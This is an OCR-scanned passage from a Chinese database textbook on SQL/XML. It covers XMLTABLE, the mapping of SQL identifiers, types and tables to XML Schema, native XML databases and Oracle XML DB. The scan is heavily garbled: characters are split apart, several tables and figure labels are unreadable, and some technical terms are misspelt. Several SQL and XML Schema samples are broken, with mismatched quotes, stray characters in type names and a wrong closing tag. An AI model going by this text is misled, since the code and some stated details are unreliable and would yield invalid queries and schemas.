XQuery-expression] 

如 果 data-type 是 XML ( SEQUENCE)， 那 么 必须 指定 不 是 BY REF 就 是 BY VALUE， 并 
且 XQuery-expression 将 通过 引用 或 通过 值 返回 类 型 为 XML (SEQUENCE) 的 值 。 如 果 data- 
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type 为 其 他 类 型 ，BY REF 和 BY VALUE 都 不 可 以 指定 ，XQuery-expression 将 返回 XML 
(COMMENT (ANY)) 或 XML (COMMENT (UNTYPE))。 如 果 没 有 说 明 PATH 子 句 ， 则 
列 的 数据 来 自 其 名 与 column-name 相同 的 元 素 ， 并 且 它 是 一 般 形 成 一 个 行 的 XML 值 的 直接 
孩子 。 如 果 给 出 了 PATH ， 那 么 XQuery-expression 在 一 般 形成 一 个 行 的 XML 值 的 上 下 文中 
被 计算 ， 其 结果 存储 到 所 定义 的 列 中 。 

XMLTABLE 的 操作 类 似 于 碎 化 ( shredding)。 一旦 碎 化 完成 ， 虚 表 可 以 通过 使 用 普通 的 
SQL INSERT 语句 插入 到 事先 已 存在 的 SQL 基 表 中 长 义 存储 ， 也 可 以 仅仅 作为 虚 表 用 在 另 
一 个 SQL 语句 中 ， 甚 至 可 能 用 在 连接 表达 式 中 。 

下 面 的 例子 演示 了 如 何 使 用 XMLTABLE。 


| 例 30.13 3 使 用 XMLTABLE 
产生 一 个 表 ， 包 含 所 有 员工 的 数据 以 及 一 个 序列 号 ， 表 示 各 员工 数据 在 XML 文件 中 的 位 置 。 


SELECT s.* 
FROM XMLStaff xs， 
XMLTABLE (FOR $S IN /STAFF WHERE $S/SALARY > 10000” 
PASSING BY VALUE xs.staffData 
COLUMNS 
“seqNo” FOR ORDINALITY, 
“staffNo” VARCHAR(5) PATH ‘STAFFNO,, 
“fName” VARCHAR(30) PATH ‘NAME/FNAME., 
“IName” VARCHAR(30) PATH ‘NAME/LNAME,, 
“position” VARCHAR(5) PATH ‘POSITION,, 
“DOB” DATE PATH ‘DOB,, 
“salary™ DECIMAL(7,2) PATH ‘SALARY,, 
“branchNo” CHAR(4) PATH ‘@branchNo’) AS s; 
初始 化 XQuery， 用 xs.staffData 作为 上 下 文 结 点 ， 然 后 执行 “FOR $S IN //STAFF 
WHERE $S/SALARY > 10000” 表 达 式 。 行 模式 指出 如 何在 XML 值 内 找到 行 。 结 果 是 结 点 
的 序列 ， 每 个 结 点 由 工资 超过 £10 000 的 <STAFF> 元 素 组 成 。 序列 中 的 每 个 结 点 又 将 成 为 
结果 表 中 的 一 行 。 为 了 找到 一 行 中 的 列 ， 我 们 将 相应 的 XQuery 表达 式 ( 列 模 式 ， 每 列 顺 着 
PATH 关键 字 找 到 ) 运用 到 <STAFF> 元 素 ， 并 转换 为 列 声明 的 类 型 。 因 为 在 大 多 数 情况 下 ， 
会 选择 关键 字 PATH， 列 模式 将 是 个 XPath 表达 式 (一 种 特殊 的 XQuery 表达 式 )。 序 号 列 
SEQNO 被 赋予 项 目 在 序列 中 的 项 目 顺序 编号 。 
结果 显示 在 表 30-7。 


表 30-7 例 30.13 结果 表 


区 到 ome | po ae | soey | 


映射 函数 

SQL/XML 标准 也 定义 了 从 表格 到 XML 文档 的 映射 。 映 射 源 可 以 是 一 个 单独 的 表格 、 
给 定 模 式 的 所 有 表格 ,或 者 给 定 目 录 下 的 所 有 表格 。 该 标准 并 没有 详细 定义 映射 的 语法 ， 
只 是 提供 给 应 用 使 用 并 且 作 为 其 他 标准 的 参考 。 映 射 产生 两 个 XML 文档 : 一 个 包含 映射 
的 表格 数据 ， 另 一 个 包含 描述 第 一 个 文档 的 XML Schema。 从 XML 到 SQL 的 映射 涉及 将 










branchNo 





«< 


328  ” 氏 八 部 分 Web 与 DBMS 


Unicode 映射 到 SQL 字符 集 和 将 XML Name 映射 为 SQL 标识 符 。 本 节 中 我 们 简要 讨论 这 
些 映射 。 我 们 从 描述 SQL 标识 符 怎样 映射 到 XML Name 和 SQL 数据 类 型 怎样 映射 到 XML 
Schema 数据 类 型 开始 。 

SQL 标识 符 到 XMLName (或 反 过 来 ) 的 映射 ”映射 SQL 标识 符 到 XML Name 有 很 多 
问题 需要 解决 ， 例 如 : 

e SQL 标识 符 比 XML Name 能 够 使 用 的 字符 范围 大 。 

e SQL 定 界 标识 符 ( 以 双 引 号 确定 界限 的 标识 符 ) 允许 在 标识 符 内 任 一 点 上 使 用 任意 字符 。 

e 以 “XML” 开 头 的 XML Name 为 保留 字 。 

e XML 命名 空间 用 “:” 来 区 分 命名 空间 前 缀 与 本 地 成 分 。 

用 来 解决 这 些 问 题 的 方法 依赖 于 一 个 逃逸 标记 ( escape notation)， 它 将 XML Name 中 
不 能 接受 的 字符 转换 成 基于 Unicode 值 的 可 接受 字符 序列 。 习 惯 是 使 用 “xHHHH_” 代 
替 不 可 接受 字符 ， 其 中 HHHH 是 对 应 的 Unicode 值 的 等 价 十 六 进 制 表示 。 例 如 ， 标 识 符 
“Staff and Branch ”被 映射 成 “Staff x0040 and x0040_Branch”,“s:staffNo ”被 映射 成 “s_ 
x003A_staffNo”。 该 映射 有 两 种 变 体 ， 分 别 被 称 为 部 分 逃逸 (partially escaped) 和 完全 逃逸 
(fully escaped)( 前 例 中 ， 字 符 “:” 不 被 映射 ) 。 

对 于 从 SQL 标识 符 到 XML 名 称 的 映射 ， 无 论 是 部 分 逃逸 还 是 完全 逃逸 ， 单 个 算法 就 
能 翻转 过 来 。 其 基本 思想 是 由 左 到 右 扫描 XML Name， 寻 找 形式 为 “x_ HHHH ”或 “_ 
xHHHHHHx” 的 转 义 序列 。 这 样 的 序列 分 别 被 转换 为 对 应 于 Unicode 编码 点 U +0000HHHH 
或 U+OOHHHHHH 的 SQL_TEXT 字符 。 

SQL 数据 类 型 到 XML Schema 数据 类 型 的 映射 ”在 7.1.2 节 中 讨论 过 ，SQL 的 多 个 
预定 义 ( predefined) 数据 类 型 ， 在 9.4 节 还 讨论 过 三 种 预定 义 结构 化 (constructed) 类 型 
(ROW，ARRAY 和 MULTISET)。 男 一 方面 , XMLSchema Part 2 : Dtatatypes 为 XML 定 
义 了 若干 简单 数据 类 型 以 及 这 些 类 型 值 的 文字 表示 。 除 了 结构 化 类 型 和 引用 类 型 外 ，SQL/ 
XML 把 每 一 个 SQL 数据 类 型 都 映射 到 XML Schema 中 最 匹配 的 类 型 有 时 需 利 用 方 
面 (facet) 来 限制 可 接受 的 XML 值 ， 以 达到 最 贴切 的 匹配 。 例 如 ， 利 用 minInclusive 和 
maxJnclusive 方 面 将 SQL SMALLINT 数据 类 型 映射 到 XML SchemaX 的 xs:integer 数据 类 
型 的 限制 ， 由 实现 定义 的 精确 来 分 别 设置 最 小 和 最 大 整数 值 (例如 ，16 位 的 二 进 制 补 码 
整数 -32768 到 32767 ) 。 表 30-8 展示 了 一 些 映射 。 注 意 在 DECIMAL (8，2 ) 的 情况 中 ， 
XML 精度 是 9 而 SQL 精度 是 8。 这 是 可 能 的 ， 因 为 SQL 实现 能 够 挑选 一 个 大 于 或 等 于 指 
定 精 度 的 精度 值 。XML 值 反 映 了 实现 所 选择 的 精度 值 。 注 意 特殊 的 XML 命名 空间 前 绥 
“sqlxml” 的 使 用 ， 对 应 于 http://standards.iso.org/iso/9075/2003/sqlxml.xsd。 


表 30-8 SQL 数据 类 型 到 XML Schema 数据 类 型 的 映射 例子 











SQL 数据 类 型 staffXMLCol 





<xs:simpleType> 
<xs:restriction base = "xs:integer"> 
<xs:minInclusive Value = "-32768"> 
<xs:maxInclusive value = "32767"> 
<xs:annotation> 
<appinfo> 
<sqlxml:sqltype name = "SMALLINT"> 
<appinfo> 
</xs:annotation> 
</xs:restriction> 
</xs:simpleType> 


SMALLINT 
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( 续 ) 
SQL 数据 类 型 staffXMLCol 


<xs:simpleType> 
<xs:restriction base = "xs:decimal"> 
<xs:totaldigits value = "9"> 
<xs:fractiondigits value = "2"> 
<xs:annotation> 
<appinfo> 
<sqlxml:sqltype name = "DECIMAL"> 
</appinfo> 
userPrecision = "8" scale = "2"> 
</xs:annotation> 
</xs:restriction> 
</xs:simpleType> 


DECIMAL (8, 2) 


<xs:simpleType> 
<xs:restriction base = "xs:string"> 
<xs:length value = "10"> 
<xs:annotation> 
<appinfo> 
<sqlxml:sqltype name = "CHAR" length = "10"> 
</appinfo> 
</xs:annotation> 
</xs:restriction> 
</xs:simpleType> 


CHAR (10) 


表格 到 XML 文档 的 映射 ”映射 单个 表格 ， 只 需 创建 一 个 以 表 命 名 的 根 元 素 ， 而 后 为 表 
中 每 行 创建 一 个 <row> 元 素 。 每 行 包 含 一 个 列 元 素 的 序列 ， 每 个 列 都 以 表 中 对 应 列 命名 。 
每 列 元 素 包含 一 个 数据 值 。 预 定义 类 型 的 值 首先 转换 为 字符 串 ， 然 后 将 该 字符 串 映射 为 对 应 
的 XML 值 的 串 表示 。 数 值 类 型 的 值 映 射 后 无 变化 。 表 30-9 给 出 了 SQL 值 到 XML 映射 的 
例子 。 表 和 列 元 素 的 名 称 通过 将 SQL 标识 符 完 全 逃逸 映射 到 XMLNames 的 方式 来 产生 。 例 
如 ， 图 4-3 中 Staff 表 的 第 一 行 被 映射 成 图 30-27 中 所 示 的 内 容 。 当 某 个 给 定 模式 或 给 定 目 
录 中 所 有 表格 都 被 映射 后 ， 则 创建 一 个 以 模式 / 目录 命名 的 外 部 元 素 。 


表 30-9 了 映射 SQL 数据 类 型 为 XML Schema 数据 类 型 的 例 


ET 2 

reo Pe 

DECIMAL ( 8,2) 12345.67 

TIMESTAMP 2009-01-27T10:35:00 
<POSTCODE> 

RCH | om", su) UDPART IRA UDPAl 
</POSTCODE> 
<BRANCHNO> 


<element>B001 </element> 


CHAR (4)ARRAY[4] ARRAY[ “B001’, ‘B002', NULL] <element>B002</element> 


<element xsi:nil= “true” /> 
</BRANCHNO> 





空 值 ( null) 除了 提供 要 映射 表格 的 名 字 外 ， 用 户 必 须 说 明 怎么 处 理 空 值 。 选 项 有 术语 
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“absent” 和 “nil”。 如 果 指 定 了 “ absent”， 任 意 带 有 空 值 的 列 会 被 映射 忽略 。 如 果 指 定 了 
“ni”， 属 性 xsi:nil = "true" 用 来 标示 代表 空 值 的 列 元 素 。 例 如 ， 在 Viewing 表 中 comment 
可 能 为 空 值 。 这 种 情况 下 选择 “nil” 将 会 产生 下 列 没 有 附加 注释 的 comment 元 素 : 


<COMMENT xsinil = "true" /> 


<STAPF> 
<row> 
<STAFFNO>SL21</STAFFNO> 
<FNAME>John</FNAME> 
<LNAME>White</LNAME> 
<POSITION>Manager</POSITION> 
<SEX>M</SEX> . 
<DOB>1945-10-01</DOB> 
<SALARY>30000</SALARY> 
<BRANCHNO>B005</BRANCHNO> 
</row> 
</STAFF> 


图 30-27 映射 staff 表 为 XML 


产生 一 个 XML Schema 产生 一 个 XML Schema， 首 先 要 为 待 映射 表 的 定义 中 用 到 的 每 
个 类 型 创建 全 局 命名 的 XML Schema 数据 类 型 。 给 被 映射 数据 类 型 命名 时 沿用 这 样 的 命名 习 
惯 ， 即 在 基 类 型 的 名 字 上 后 级 以 长 度 或 /和 精度 。 例 如 ，CHAR (10 ) 被 命名 为 CHAR_10， 
DECIMAL (8，2 ) 被 命名 为 DECIMAL 8 2, 但 是 INTEGER 保持 不 变 。 对 Staff 表格 ， 我 们 
得 到 图 30-28 所 示 的 XML Schema。 该 模式 由 一 系列 分 别 为 每 列 指定 的 XML Schema 类 型 组 
成 (在 此 只 显示 了 与 staffNo 列 对 应 的 第 一 个 类 型 VARCHAR (5 ))。 接 下 来 ， 为 表 中 诸 行 的 
类 型 创建 一 个 命名 的 XML Schema 类 型 (用 于 该 类 型 的 名 称 为 “RowType ”并 上 目录 名 、 模 
式 名 和 表 名 )。 然 后 是 为 表 本 身 的 类 型 创建 命名 的 XML Schema 类 型 (用 于 该 类 型 的 名 称 为 
“TableType ”并 上 目录 名 、 模 式 名 和 表 名 )。 最 后 ， 基 于 这 个 新 的 表 类 型 为 Staff 表 创 建 一 个 
元 素 。 关 于 XML 类 型 和 映射 函数 的 进一步 信息 ， 感 兴趣 的 读者 可 以 参考 SQL/XML 规范 
(ISO，2011b)。 下 一 节 我 们 将 简要 考察 纯 XML 数据 库 。 

映射 非 预定 义 数据 类 型 

在 本 节 中 ， 我 们 考虑 如 何 将 非 预定 数据 类 型 映射 到 XML Schema， 包 括 域 、 特 有 UDT、 
行 、 数 组 和 多 重 集 。 

域 (domain) 再 次 考虑 7.2.2 节 为 SexType 列 创建 的 域 : 

CREATE DOMAIN SexType AS CHAR 


DEFAULT ‘M’ 
CHECK (VALUE IN (M’, 'F’")); 


为 此 列 生成 的 XML Schema 如 下 所 示 : 


<xs:simpleType name="DOMAIN.MYCATALOG.MYSCHEMA.SEXTYPE”> 
<xs:annotation> 
<xs:appinfo> 
<Sqlxml:sqltype kind="DOMAIN” 
catalogName="MYCATALOG” 
schemaName=“MYSCHEMA” 
typeName="SEXTYPE” 
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mappedType="CHAR_1" 


final="true"/> 
</xs:appinfo> 
</xs:annotation> 
<xs:restriction base="CHAR_1"/> 
</simpleType> 





30-28 ”为 staff 表 产 生 XML Schema 


特有 UDT (distinct UDT) 在 这 个 例子 中 ， 如 果 用 一 个 特有 UDT 代替 域 ， 则 可 以 实现 


更 强 的 类 型 化 (参见 9.5.2 节 ): 
CREATE TYPE SexType As CHAR FINAL 


<xs:simpleType name="UDT.MYCATALOG.MYSCHEMA.SEXTYPE”> 


<xs:annotation> 
<xs:appinfo> 
<sqlxml:sqltype kind="DISTINCT” 

catalogName="MYCATALOG” 
schemaName="MYSCHEMA” 
typeName="SEXTYPE” 
mappedType="CHAR_1” 
final="true”/> 

</xs:appinfo> 

</xs:annotation> 


<xs:restriction base="CHAR_1”/> 
</simpleType> 
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在 这 种 情况 下 ， 将 会 产生 下 面 的 XML Schema 类 型 定义 : 

行 (row) 一 个 行 类 型 ( 见 9.5.1 节 ) 可 以 被 用 来 定义 分 公司 的 地 址 位 置 。SQL 的 行 
型 是 匿名 的 ， 这 使 得 只 使 用 该 行 的 定义 构建 一 个 唯一 的 名 称 是 不 可 能 的 。 相 反 ， 通 过 附加 一 
个 由 实现 选择 的 唯一 标识 符 到 正文 “ROW ”上 来 构造 名 称 。 使 用 完全 相同 的 ROW 类 型 的 
两 列 可 以 共享 这 一 个 行 类 型 的 XML Schema 定义 ， 或 者 也 可 以 使 用 两 个 不 同 的 定义 。 

考虑 来 自 例 9.1 的 这 个 简化 的 行 类 型 


CREATE TABLE Branch ( 


address ROW (street VARCHARI(25)， 
city VARCHAR!(15), 
cityidentifier VARCHAR(4)， 
subPart VARCHAR(4))); 


在 这 种 情况 下 ， 将 会 产生 以 下 的 XML Schema 类 型 定义 : 


<xs:complexType name=“ROW.1"> 
<xs:annotation> 
<xs:appinfo> 
<sqlxml:sqltype kind="ROW"> 
<sqlxml:field name=“STREET” 
mappedType="VARCHAR_25"”/> 
<sqlxml:field name="CITY” 
mappedType="VARCHAR_15”/> 
<sqlxml:field name="“CITYIDENTIFIER” 
mappedType="VARCHAR_4"/> 
<sqlxml:field name=“SUBPART” 
mappedType="VARCHAR_4"/> 
</sqlxml:type> 
</xs:appinfo> 
</xs:annotation> 


<xs:sequence> 
<xs:element name=“STREET” 
nillable='true' type="VARCHAR_25’/> 
<xs:element name="“CITY” 
nillable='true’ type=VARCHAR_15'/> 
<xs:element name="CITYIDENTIFIER” 
nillable='rue' type='VARCHAR_4/> 
<xs:element name=“SUBPART” 
nillable='true' type='VARCHAR_4'/> 
</xs:sequence> 


</complexType> 


数组 (array) 正如 我 们 在 9.5.9 节 所 讨论 的 ， 一 个 数组 不 是 必须 由 独特 的 值 组 成 的 一 个 
有 序 集 ， 其 元 素 通 过 它们 在 数组 中 的 序号 位 置 来 引用 。 例 9.11 可 用 于 对 分 公司 有 3 个 电话 
号 码 这 条 需求 建 模 ， 可 以 将 该 列 实现 为 一 个 数组 集 类 型 : 

telNo VARCHAR(13) ARRAY[3] 


在 这 种 情况 下 ， 将 会 产生 以 下 的 XML Schema 类 型 定义 : 


<xs:complexType name="ARRAY_3.VARCHAR_13”> 
<xs:annotation> 
<xs:appinfo> 
<sqlxml:sqltype kind="ARRAY” 
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maxElements="3” 
mappedElementType="VARCHAR_13"/> 
</xs:appinfo> 
</xs:annotation> 


<xs:sequence> 
<xs:element name="“element" 
minOccurs="0” maxOccurs="3” 
nillable=“true” type="VARCHAR_13"/> 
</xs:element> 
</xs:sequence> 
</xs:complexType> 


多 重 集 (multiset) 分 公司 的 电话 号 码 也 可 以 采用 一 个 多 重 集 而 非 数组 来 定义 : 
telNo VARCHAR(13) MULTISET 


如 9.5.9 节 所 讨论 的 ， 一 个 多 重 集 是 一 个 无 序 元 素 集 ， 所 有 元 素 具 有 相同 的 类 型 并 允许 
出 现 重 复 值 。 由 于 多 重 集 是 无 序 的， 无 法 用 顺序 位 置 引 用 一 个 多 重 集 的 单个 元 素 。 与 数组 不 
同 ， 一 个 多 集 是 一 个 没有 声明 最 大 基数 的 无 限 集 (虽然 会 有 一 个 实现 定义 的 限制 )。 在 这 种 
情况 下 ， 就 可 以 产生 下 面 的 XML Schema 的 类 型 定义 : 


<xs:complexType name="MULTISET.VARCHAR_13"> 
<xs:annotation> 
<xs:appinfo> 
<Sqlxml:sqltype kind="MULTISET” 
mappedElementType=“VARCHAR_13'"/> 
</xs:appinfo> 
</xs:annotation> 


<XS:Sequence> 
<xs:element name="“element" 
minOccurs="0”" maxOccurs="unbounded” 
nillable="true” type="VARCHAR_13"”/> 
</xs:element> 
</xs:sequence> 
</xs:complexType> 


30.6.3 纯 XML 数据 库 


本 节 我 们 讨论 最 近 出 现 的 另 一 种 类 型 的 数据 库 ， 它 支持 XML 的 存储 和 检索 ， 称 为 纯 
XML 数据 库 。 我 们 首先 给 出 由 XML:DB 邮件 列表 成 员 下 的 定义 。 


纯 XML 数据 库 ( NXD ) | 定义 了 一 个 XML 文档 的 (逻辑 ) 数据 模型 ， 用 此 模型 存储 和 检索 
XML。XML 文档 必须 作为 (逻辑 ) 存储 单位 ， 虽 然 低 层 物 理 存储 模型 可 不 尽 相 同 〈 因 此 ， 
比如 关系 的 、 对 象 - 关系 的 和 层次 的 存储 系统 都 有 可 能 )。 


该 定义 的 关键 是 逻辑 模型 必须 基于 XML， 结 果 DBMS 大 都 设计 用 来 存储 和 检索 以 文 
档 为 中 心 的 文档 。 一 些 反对 者 认为 ， 不 仅 逻 辑 模 型 ， 物 理 存储 模型 也 应 该 基于 XML， 因 此 
仅 在 顶层 加 一 个 XML 层 的 任意 模型 都 是 不 合适 的 。 正 如 任意 其 他 类 型 的 DBMS 一 样 ， 纯 
XML DBMS 还 应 该 支持 事务 、 并 发 、 恢 复 和 安全 。 另 外 ， 我 们 也 和 希望 DBMS 支持 其 他 的 
XML 技术 ， 例 如 XQuery 、XPath 、XML Schema、XPointer 和 XSL/XSLT。 

纯 XML DBMS 有 两 种 主要 类 型 ; 

e 基于 文本 (text-based)， 将 XML 存储 为 文本 ， 例 如 文件 系统 中 的 文件 ， 或 者 关系 DBMS 
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中 的 CLOB。 

基于 模型 ( model-based)， 将 XML 存储 为 内 部 树 结构 ， 例 如 ， 用 Infoset 或 PSVI 表 
示 , 或 者 用 DOM 表示， 也 可 能 带 有 标记 标签 。 该 方法 能 根据 XML 文档 的 结构 和 内 
容 直接 识别 和 检索 信息 ， 并 且 基 于 元 素 值 的 索引 性 能 也 很 好 。 


无 论 哪 种 类 型 ， 我 们 都 希望 纯 XML DBMS 不 仅 能 够 处 理 查 询 和 插入 / 删除 操作 ， 而 且 
能 够 能 够 处 理 XML 文档 的 部 分 更 新 。 纯 XML DBMS 的 例子 有 : MarkLogic Server (来 自 
于 Mark Logic 公司 )、Ipedo XMLDB (来 自 于 Ipedo)、Tamino (来 自 于 Software AG)、 开 源 
BaseX (来 自 于 康 斯 坦 芯 大 学 ) 和 开源 Xindice (来 自 于 Apache 软件 基金 会 )。 


30.7 


Oracle 中 的 XML 


Oracle 已 经 完全 将 XML 集成 到 了 Oracle9i、Oracle10g 和 Oraclellg 系统 中 ， 这 暗示 了 
该 语言 的 重要 性 。 本 节 中 我 们 简要 考察 一 些 已 经 引入 到 Oracle 中 的 XML 特性 ， 确 切 地 讲 包 
括 Oracle XML 开发 套件 (XDK) 和 Oracle XML DB。 

Oracle 最 早 是 在 Oracle8i 的 版 本 8.1.7 中 加 入 Oracle XDK， 同 时 开始 支持 XML。 现 在 
有 若干 个 XDK， 涵 盖 Java、JavaBeans、C/C++ 和 PL/SQL。 各 个 XDK 都 是 组 件 、 库 和 工 
有 具 的 集合 ， 包 括 : 


一 个 XML 分 析 器 : 支持 Java、C 和 C++， 该 组 件 使 用 DOM/ SAX 接口 创建 和 解析 XML。 
一 个 XML Schema 处 理 器 : 支持 Java、C 和 C++， 人 允许 使 用 XML 简单 和 复杂 的 数 
据 类 型 。 

一 个 XSL 处 理 器 : 转换 或 呈现 XML 为 其 他 基于 文本 的 格式 。 

一 个 XMLJava 压缩 器 : 通过 标记 XML 标签 支持 XML 文档 的 二 进 制 压缩 。 

一 个 XML 类 产生 器 : 从 XMLSchema 自动 生成 C++ 和 Java 类 ， 用 于 发 送 来 自 Web 
表单 或 应 用 程序 的 XML 数据 。 

XML JavaBeans: 通过 Java 组 件 查看 和 转换 XML 文档 和 数据 的 一 套 JavaBeans。 
一 个 Java 服务 器 小 程序 XSQL : 负责 从 SQL 查询 结果 产生 XML 文档 、DTDs 和 
XML Schema， 但 SQL 查询 结果 利用 XSL 样式 表单 进行 了 格式 化 。 该 服务 器 小 程序 
还 能 支持 用 XML 插入 、 更 新 和 删除 数据 。 

针对 于 Java 和 PL/SQL 的 实用 程序 XML SQL : 它 支 持 通过 DBMS XMLGEN 预定 
义 的 包 ， 利 用 SQL 从 或 向 数据 库 读 或 写 XML 数据 。 

JAXP (面向 XML Processing 的 Java API) : 允许 开发 者 使 用 来 自 Java 的 SAX、DOM 
和 XSLT 处 理 器 ， 使 得 应 用 能 利用 独立 于 特定 XML 处 理 器 实现 的 API， 来 分 析 和 转 
换 XML 文档 。 

Oracle SOAP 和 简单 对 象 访问 协议 的 实现 : 该 实现 基于 由 Apache 软件 基金 会 开发 的 
SOAP 开源 实现 。 


图 30-29 说 明了 Oracle 关于 Java 的 XDK 中 各 组 件 之 间 的 交互 关系 。Oracle 引入 了 
Oracle XML DB ， 一 套 XML 特定 的 存储 和 检索 技术 。Oracle XML DB 能 够 用 来 存储 、 查 询 、 
更 新 和 转换 XML ， 同 时 允许 使 用 SQL 访问 XML。 更 具体 地 讲 ， 它 支持 : 


SQL:2011 SQL/XML 的 大 多 数 功 能 ; 它 支 持 预 定义 的 纯 XML 类 型 ， 称 为 XMLType (而 
不 是 ISO 名 称 XML)， 并 且 支 持 操 作 符 XMLQUERY 、XMLTABLE 、XMLELEMENT、 
XMLFOREST 、XMLCONCAT 、XMLCAST 、XMLPARSE、XMLCOMMENT、 
XMLPI 和 XMLAGG， 这 些 在 30.6.2 节 讨论 过 。 
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浏览 器 / 

应 用 程序 
Ee- XML,HTML Text 

起 一 
@@ SQL 查询 
带 或 不 带 
DTD 或 XML 
Schema 的 XML 文档 






DOM 或 String 1 


Generator 


a | | 


XML Document from 
LOB/XML Type 






创建 Java 
源 文件 
Stream |[ XML |DOM 或 SAX 


Parser | ,解析 的 DTD 对 象 Java 集成 到 
本 Hr 醒 要 JDeveloper 
和 区 
程 
ie ‘ XML 分 析 器 i ke 
据 DTD or 
ee x 
3— LOBs 四 
Oracle 本 二 
XML 文档 存 为 : 


示 格式 化 和 Stylesheet 
CLOB 或 BLOB 

A pyr i 定制 的 XML 文 档 

“ 跨 表 分 布 的 无 标签 数据 。 

“组 合 文档 和 数据 的 视图 。 


图 30-29 Oracle 关于 Java 的 XML 开发 套件 
e XML Schema; 例如 : 
上 一 个 XMLType 对 象 能 够 基于 XML Schema 创建 并 进行 后 续 验证 。 
至 能 够 使 用 包 DBMS_XMLSCHEMA 来 注册 XML Schema 以 便 共 享 存储 和 类 型 定 
义 ， 以 及 可 选 地 创建 表格 。 
上 当 XML 文档 被 加 入 数据 库 时 或 者 显示 调用 XMLType 的 SchemaValidate 方法 时 ， 
能 对 照 指定 的 XML Schema 自动 地 验证 。 
上 四 使 用 函数 DBMS_XMLSCHEMA.generateSchema() 能 够 由 一 个 对 象 - 关系 类 型 产 
生 一 个 XML Schema， 返 回 包 含 该 XML Schema 的 XMLType。 
晶 如 果 XML Schema 存在 ，updateXML() 方法 能 够 用 来 更 新 文档 中 的 一 小 片 (通常 
该 方法 会 用 一 个 新 文档 ， 而 不 是 被 更 新 的 一 小 片 文档 替换 整个 文档 )。 
e 碎片 化 保持 DOM 保 真 度 (fidelity) 的 XML 文档 。 
e 包含 XMLTransform() 和 XMLType.Transform() 函数 的 XSLT 2.0。 
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e 通过 Oracle XML DB 库 ， 类 似 访问 文件 系统 一 样 访问 所 有 数据 库 数据 。 
该 库 允 许 用 户 : 
到 把 数据 库 及 其 内 容 看 作 包 含 资源 (文件 和 文件 夹 ) 的 文件 系统 。 
有 通过 基于 路 径 名 的 SQL 和 Java API 访问 和 操作 资源 。 
昌 通过 预定 义 的 FTP、HTTP 和 WebDAV (Web-based Distributed Authoring and Versioning) 
协议 服务 器 访问 和 操作 资源 。WebDAV 是 HTTP 的 扩展 集合 ， 人 允许 用 户 在 远程 
Web 服务 器 上 发 布 和 管理 内 容 。 
四 为 Oracle XML DB 资源 实现 访问 控制 列表 (ACL) 安全 机 制 。 

e URLs 和 URIs， 使 得 可 以 利用 URLs 定义 XML 文档 之 间 的 关系 ， 并 且 使 用 基于 路 径 
的 比喻 (path-based metaphor) 访问 文档 内 容 。 定 义 了 名 为 URIType 的 新 类 型 ， 其 子 类 
型 为 DBUriType， 用 来 存储 数据 库 中 关系 数据 的 引用 。HttpUriType 用 来 存储 能 够 通过 
HTTP 访问 的 数据 的 引用 ; XDBUriType 用 来 存储 Oracle XML DB 中 资源 的 引用 。 

e XML 文档 索引 和 搜索 。Oracle 文本 能 够 用 于 高 级 搜索 。 

Oracle XML DB 体系 结构 如 图 30-30 所 示 。 












XML Services Retrieve / Generate XML Services 
» XML Validation XML using * Versioning 
*XML Transtormation “XMLType APls * ACL Security 
* XML Schema * SQL * Foldering 
Registration * Java 
"Create Tables » PL/SQAQL Retrieve / Generate 
* Insert, Delete, Update 。C XML using 
XMLType tables * C++ Resource APls 
* Indexing * SQL 
* Java 
* PLUSQL 


图 30-30 XMLType 存储 和 Oracle XML DB 体系 结构 
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本 章 小 结 


半 结 构 化 数据 ( semistructured data) 是 具有 一 些 结构 的 数据 ,但 是 结构 可 能 不 严格 、 不 规范 或 者 不 
完整 ， 而 数据 并 不 遵从 一 个 固定 的 模式 。 有 时 用 术语 “无 模式 ”( schema-less) 或 者 “ 自 描述 ”(self- 
describing) 特 指 这 样 的 数据 。 

半 结 构 化 数据 的 一 种 推荐 模型 是 对 象 交换 模型 ( Object Exchange Model，OEM)， 为 一 种 藤 套 的 对 
象 模型 。OEM 中 的 数据 可 以 认为 是 一 个 带 标记 的 有 向 图 ， 图 中 结 点 是 对 象 。OEM 对 象 由 对 象 标识 
符 、 描 述 性 文本 标记 、 类 型 和 值 组 成 。 

半 结 构 化 DBMS 的 一 个 示例 是 Lore (Lightweight object repository)，Lore 是 多 用 户 的 DBMS， 支 
持 故 障 恢复 、 视 图 物化 、 某 种 标准 格式 (支持 XML) 的 大 规模 文件 装载 和 一 种 称 为 Lorel 的 说 明 性 
更 新 语言 。Lore 还 有 一 个 外 层 的 数据 管理 器 ， 在 查询 过 程 中 ， 该 管理 器 可 以 动态 地 获取 外 层 资源 的 
数据 ， 并 与 本 地 的 数据 相 结合 。Lorel 是 OQL 的 一 个 扩展 ， 支 持 遍 历 图 结构 的 说 明 性 路 径 表 达 式 ， 
并 能 自动 处 理 异 构 和 无 类 型 数据 。 

XML ( eXtensible Markup Language， 可 扩展 的 标记 语言 ) 是 一 种 元 语言 (描述 其 他 语言 的 一 种 语 
言 )， 使 设计 者 能 创建 他 们 自己 的 定制 标记 来 提供 HTML 中 没有 的 功能 。XML 是 SGML 的 一 个 受 
限 形式 ， 是 一 种 不 如 SGML 复杂 的 标记 语言 ， 同 时 更 适用 于 网 络 。 

XML API 通常 有 两 类 : 基于 树 的 和 基于 事件 的 。DOM (( Document Object Model， 文档 对 象 模型 ) 
是 XML 的 基于 树 的 API， 提 供 数据 的 面向 对 象 的 视图 。API 由 W3C 创建 ， 描 述 一 组 与 平台 和 语 
言 无 关 的 接口 ， 该 接口 能 表示 任意 合式 的 XML 或 HTML 文档 。SAX ( Simple API for XML) 是 对 
XML 的 一 个 基于 事件 的 、 串 行 访问 的 API， 它 使 用 回调 来 向 应 用 程序 报告 解释 的 事件 。 应 用 程序 
通过 定制 的 事件 处 理 器 来 处 理 这 些 事件 。 

XML 文档 由 元 素 、 属 性 、 实 体 引用 、 注 释 、CDATA 节 和 处 理 指令 组 成 。 一 个 XML 文档 
可 以 选择 有 一 个 文档 类 型 定义 ( Document Type Definition，DTD)， 它 定义 一 个 XML 文档 的 合法 
语法 。 

XML 规范 提供 文档 处 理 的 两 个 级 别 : 合式 的 和 合法 的 。 基 本 上 ， 一 个 符合 XML 结构 和 表示 方法 规 
则 的 XML 文档 可 以 认为 是 合式 的 (well-formed)。 合 式 且 符合 一 个 DTD 的 XML 文档 被 认为 是 合 
法 的 (valid ) 。 

XML Schema 是 特定 的 XML 结构 的 定义 (根据 它 的 组 织 和 数据 类 型 )。XML Schema 用 W3C XML 
Schema 语言 来 规定 模式 中 的 每 一 种 类 型 的 元 素 如 何 定义 ， 以 及 元 素 相关 的 是 什么 数据 类 型 。 模 式 
